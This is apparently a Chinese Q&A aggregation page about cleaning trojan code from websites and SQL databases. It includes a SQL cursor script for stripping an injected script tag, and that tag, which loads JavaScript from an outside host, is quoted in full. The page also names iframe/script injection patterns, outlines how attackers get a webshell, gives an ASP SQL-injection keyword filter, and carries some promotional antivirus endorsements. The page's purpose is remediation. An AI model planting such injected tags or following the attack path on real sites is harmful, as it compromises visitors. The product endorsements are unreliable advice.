當前位置:首頁 » 數據倉庫 » 木馬資料庫被修改
擴展閱讀
webinf下怎麼引入js 2023-08-31 21:54:13
堡壘機怎麼打開web 2023-08-31 21:54:11

木馬資料庫被修改

發布時間: 2022-04-22 12:12:47

Ⅰ 怎麼找到網站中的木馬,怎麼解決

別人利用掃描工具掃描你的SIQ漏洞嗎,在注入就可以啦,他就可以或者管理員賬號了,在可以隨便修改你的資料庫了,解決辦法先說下木馬的清除:
1.整站被掛馬,最快速的恢復方法是,除開資料庫、上傳目錄之外,替換掉其他所有文件;
2.仔細檢查網站上傳目錄存放的文件,很多木馬偽裝成圖片保存在上傳目錄,你直接把上傳文件夾下載到本地,用縮略圖的形式,查看是不是圖片,如果不顯示,則一律刪除;
3.資料庫裡面存在木馬,則把資料庫的木馬代碼清除!可以採用查找替換;
4.如果網站源文件沒有,則需要FTP下載網站文件,然後再DW裡面,用替換清除的方式一個個清除,注意網站的木馬數,如果被掛了很多不同的,必須多多檢查!

Ⅱ 求助:網站中了木馬,sql資料庫被注入代碼,我該如何處理

1殺毒
2.從資料庫中讀數據時,對所讀的數據進行過濾,對含有特殊代碼的數據進行屏蔽
3.如果2解決不了,就利用備份恢復資料庫

Ⅲ 如何清除網頁掛馬中的資料庫木馬

在ftp里找到掛機馬文件,然後刪除!
如果你自己也不知道哪個是木馬的話,檢查一下你的資料庫是否完整,如果資料庫沒被篡改的話,就備份資料庫,
你的網站程序應該也有備份的吧?把ftp里的文件全清空,使用上傳你備份的網站程序和資料庫!

還有要聯系一下主機商商量一下安全問題,搞清楚對方是怎麼入侵的,以防止下次再中招

Ⅳ 電腦中了木馬,把資料庫被破壞了,怎麼辦啊

殼木馬專殺是綠色軟體,直接雙擊運行就可以了
我推薦貝殼專殺而不是360安全衛士
因為這完全是兩個概念的安全輔助軟體
360雖然不錯,但是對於新木馬完全沒有免疫力
貝殼主要是針對新木馬病毒設計的
第一次使用,點擊掃描後貝殼會快速掃描,大約1-3分鍾
然後列出四種等級的文件,1.信任2.無威脅3.未知4.病毒木馬
一般你第一次掃描大多數是信任或者無威脅文件,如果有未知文件的話,你就點擊上報(這是重點),然後耐心等待1-5分鍾,最後再重新掃描一次,第二次掃描速度比第一次快幾倍
第一次掃描顯示未知的文件(就是你上報的文件)就能正確識別時木馬病毒或者是正常文件了
說到這里明白了吧,貝殼的雲安全計算目前是最快的,也就是說無論你在哪裡,網吧或者家裡,玩游戲或者網銀前用貝殼掃一下,無論是多新的病毒,只要上報了,3分鍾後就能識別出來了。360對於新病毒可是無能為力。

對於頑固病毒,貝殼也可以替換被感染的的系統文件,保護系統安全

希望樓主試用一下貝殼,真的不錯!
貝殼官方網站下載地址:
http://www.beike.cn/

Ⅳ MSSQL資料庫被插入木馬如何用SQL語句批量刪除

如何最快速度刪除?
" <script src= http://3b3.org/c.js> </script> "
---------------------------------------------------------------
進入SQL查詢分析器
選擇你的資料庫
第一步:先sql表修改所有者為dbo
EXEC sp_MSforeachtable 'exec sp_changeobjectowner ' '? ' ', ' 'dbo ' ' '

第二步:統一刪除欄位被掛的js
declare @delStr nvarchar(500)
set @delStr= ' <script src= http://3b3.org/c.js> </script> '

set nocount on

declare @tableName nvarchar(100),@columnName nvarchar(100),@tbID int,@iRow int,@iResult int
declare @sql nvarchar(500)

set @iResult=0
declare cur cursor for
select name,id from sysobjects where xtype= 'U '

open cur
fetch next from cur into @tableName,@tbID

while @@fetch_status=0
begin
declare cur1 cursor for
--xtype in (231,167,239,175,35) 為char,varchar,nchar,nvarchar,text類型
select name from syscolumns where xtype in (231,167,239,175,35) and id=@tbID
open cur1
fetch next from cur1 into @columnName
while @@fetch_status=0
begin
set @sql= 'update [ ' + @tableName + '] set [ '+ @columnName + ']= replace([ '+@columnName+ '], ' ' '+@delStr+ ' ' ', ' ' ' ') where [ '+@columnName+ '] like ' '% '+@delStr+ '% ' ' '
exec sp_executesql @sql
set @iRow=@@rowcount
set @iResult=@iResult+@iRow
if @iRow> 0
begin
print '表: '+@tableName+ ',列: '+@columnName+ '被更新 '+convert(varchar(10),@iRow)+ '條記錄; '
end
fetch next from cur1 into @columnName

end
close cur1
deallocate cur1

fetch next from cur into @tableName,@tbID
end
print '資料庫共有 '+convert(varchar(10),@iResult)+ '條記錄被更新!!! '

close cur
deallocate cur
set nocount off
---------------------------------------------------------------
徹底杜絕SQL注入

1.不要使用sa用戶連接資料庫
2、新建一個public許可權資料庫用戶,並用這個用戶訪問資料庫
3、[角色]去掉角色public對sysobjects與syscolumns對象的select訪問許可權
4、[用戶]用戶名稱-> 右鍵-屬性-許可權-在sysobjects與syscolumns上面打「×」
5、通過以下代碼檢測(失敗表示許可權正確,如能顯示出來則表明許可權太高):
DECLARE @T varchar(255),
@C varchar(255)
DECLARE Table_Cursor CURSOR FOR
Select a.name,b.name from sysobjects a,syscolumns b
where a.id=b.id and a.xtype= 'u ' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0)
BEGIN print @c
FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor
---------------------------------------------------------------
讓3b3.org c.js注入見鬼去吧!

Ⅵ 電腦中了木馬 資料庫被篡改 怎麼辦

如果是sql的話,可以進行回復數據操作,把導出的數據回復導入到新建資料庫看,然後再用殺軟在安全模式下進行殺毒!

Ⅶ ecshop商城MySQL資料庫被掛馬了,無法清除木馬

一般都是網站程序存在漏洞或者伺服器存在漏洞而被攻擊了
網站掛馬是每個網站最頭痛的問題,解決辦法:1.在程序中很容易找到掛馬的代碼,直接刪除,或則將你沒有傳伺服器的源程序覆蓋一次但反反復復被掛就得深入解決掉此問題了。但這不是最好的解決辦法。最好的方法還是找專業做安全的來幫你解決掉
聽朋友說 SineSafe 不錯 你可以去看看。

清馬+修補漏洞=徹底解決

所謂的掛馬,就是黑客通過各種手段,包括SQL注入,網站敏感文件掃描,伺服器漏洞,網站程序0day, 等各種方法獲得網站管理員賬號,然後登陸網站後台,通過資料庫 備份/恢復 或者上傳漏洞獲得一個webshell。利用獲得的webshell修改網站頁面的內容,向頁面中加入惡意轉向代碼。也可以直接通過弱口令獲得伺服器或者網站FTP,然後直接對網站頁面直接進行修改。當你訪問被加入惡意代碼的頁面時,你就會自動的訪問被轉向的地址或者下載木馬病毒

清馬

1、找掛馬的標簽,比如有<script language="javascript" src="網馬地址"></script>或<iframe width=420 height=330 frameborder=0
scrolling=auto src=網馬地址></iframe>,或者是你用360或病殺毒軟體攔截了網馬網址。SQL資料庫被掛馬,一般是JS掛馬。

2、找到了惡意代碼後,接下來就是清馬,如果是網頁被掛馬,可以用手動清,也可以用批量清,網頁清馬比較簡單,這里就不詳細講,現在著重講一下SQL資料庫清馬,用這一句語句「update 表名 set 欄位名=replace(欄位名,'aaa','')」, 解釋一下這一句子的意思:把欄位名里的內容包含aaa的替換成空,這樣子就可以一個表一個表的批量刪除網馬。

在你的網站程序或資料庫沒有備份情況下,可以實行以上兩步驟進行清馬,如果你的網站程序有備份的話,直接覆蓋原來的文件即可。

修補漏洞(修補網站漏洞也就是做一下網站安全。)

1、修改網站後台的用戶名和密碼及後台的默認路徑。

2、更改資料庫名,如果是ACCESS資料庫,那文件的擴展名最好不要用mdb,改成ASP的,文件名也可以多幾個特殊符號。

3、接著檢查一下網站有沒有注入漏洞或跨站漏洞,如果有的話就相當打上防注入或防跨站補丁。

4、檢查一下網站的上傳文件,常見了有欺騙上傳漏洞,就對相應的代碼進行過濾。

5、盡可能不要暴露網站的後台地址,以免被社會工程學猜解出管理用戶和密碼。

6、寫入一些防掛馬代碼,讓框架代碼等掛馬無效。

7、禁用FSO許可權也是一種比較絕的方法。

8、修改網站部分文件夾的讀寫許可權。

9、如果你是自己的伺服器,那就不僅要對你的網站程序做一下安全了,而且要對你的伺服器做一下安全也是很有必要了!

Ⅷ 電腦中過木馬之後殺毒軟體資料庫被破壞沒有辦法更新,在安全模式下也沒有辦法使用

從裝過系統後什麼都別動,直接下載個360清一下病毒,然後再搞個卡巴斯基徹底殺了毒後就從啟系統就可以了.不裝系統恐怕下不了,下了也裝不了,裝了也裝不完就關了.

Ⅸ 求助:網站中了木馬,sql資料庫被注入代碼,我改怎麼辦

網站是SQL資料庫嗎,你這是被注入了,網站有漏洞,必須防SQL注入,
EnableStopInjection= True
If EnableStopInjection = True Then
Dim Fy_Post,Fy_Get,Fy_In,Fy_Inf,Fy_Xh,Fy_db,Fy_dbstr
Fy_In = "'|;|and|exec|insert|select|delete|update|count|*|%|chr|mid|master|truncate|char|declare|script|<|>"
Fy_Inf = split(Fy_In,"|")
If Request.Form<>"" Then
For Each Fy_Post In Request.Form
For Fy_Xh=0 To Ubound(Fy_Inf)
If Instr(LCase(Request.Form(Fy_Post)),Fy_Inf(Fy_Xh))<>0 Then
Response.Write "<Script Language='JavaScript'>alert('警告:參數非法!');</Script>"
Response.End
End If
Next
Next
End If

If Request.QueryString<>"" Then
For Each Fy_Get In Request.QueryString
For Fy_Xh=0 To Ubound(Fy_Inf)
If Instr(LCase(Request.QueryString(Fy_Get)),Fy_Inf(Fy_Xh))<>0 Then
Response.Write "<Script Language='JavaScript'>alert('警告:參數非法!');</Script>"
Response.End
Response.End
End If
Next
Next
End If
End If